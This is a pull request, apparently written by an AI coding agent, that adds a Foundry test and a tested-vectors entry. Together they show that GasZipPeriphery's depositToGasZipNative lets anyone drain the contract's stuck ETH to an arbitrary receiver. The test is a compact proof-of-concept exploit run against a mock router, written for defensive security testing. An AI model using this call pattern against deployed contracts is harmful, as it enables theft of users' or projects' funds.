### PR TITLE
test: add coverage for GasZipPeriphery public deposit

### DIFF
--- a/TestedVectors.md
+++ b/TestedVectors.md
@@ -54,3 +54,8 @@
 - Severity: High
 - Test: `forge test --match-path test/solidity/Periphery/LiFiDEXAggregatorMaliciousPool.t.sol`
 - Result: Malicious pool drains contract's entire token balance via `uniswapV3SwapCallback` without depositing tokens.
+## GasZipPeriphery public deposit drains contract ETH
+- **Severity**: Medium
+- **Test**: `forge test --match-path test/solidity/Security/GasZipPeripheryDrainNative.t.sol`
+- **Result**: Anyone can call `depositToGasZipNative` with zero `msg.value` to forward the contract\x27s ETH balance to an arbitrary `receiverAddress`, draining stuck native tokens.
+

--- a/test/solidity/Security/GasZipPeripheryDrainNative.t.sol
+++ b/test/solidity/Security/GasZipPeripheryDrainNative.t.sol
@@ -1,0 +1,43 @@
+// SPDX-License-Identifier: UNLICENSED
+pragma solidity ^0.8.17;
+
+import "forge-std/Test.sol";
+import { GasZipPeriphery } from "lifi/Periphery/GasZipPeriphery.sol";
+import { IGasZip } from "lifi/Interfaces/IGasZip.sol";
+
+contract MockGasZipRouter is IGasZip {
+    event Deposit(uint256 destinationChains, bytes32 to, uint256 amount);
+
+    function deposit(uint256 destinationChains, bytes32 to) external payable {
+        address receiver = address(uint160(uint256(to)));
+        payable(receiver).transfer(msg.value);
+        emit Deposit(destinationChains, to, msg.value);
+    }
+}
+
+contract GasZipPeripheryDrainNativeTest is Test {
+    GasZipPeriphery gasZip;
+    MockGasZipRouter router;
+    address aggregator = address(0xdead);
+    address attacker = address(0xbad);
+
+    function setUp() public {
+        router = new MockGasZipRouter();
+        gasZip = new GasZipPeriphery(address(router), aggregator, address(this));
+        vm.deal(address(gasZip), 1 ether);
+    }
+
+    function test_DepositToGasZipNativeDrainsStuckEther() public {
+        IGasZip.GasZipData memory data = IGasZip.GasZipData({
+            receiverAddress: bytes32(uint256(uint160(attacker))),
+            destinationChains: 0
+        });
+
+        uint256 attackerBalanceBefore = attacker.balance;
+        vm.prank(attacker);
+        gasZip.depositToGasZipNative(data, 1 ether);
+
+        assertEq(address(gasZip).balance, 0);
+        assertEq(attacker.balance, attackerBalanceBefore + 1 ether);
+    }
+}


### PR DESCRIPTION
## Summary
- add failing scenario where `GasZipPeriphery.depositToGasZipNative` lets anyone drain pre-existing ETH balance
- document tested vector for public deposit draining stuck native tokens

## Testing
- `forge test --match-path test/solidity/Security/GasZipPeripheryDrainNative.t.sol -vv`


------
https://chatgpt.com/codex/tasks/task_e_68a8fce9125c832d9c42f8ba29b153b3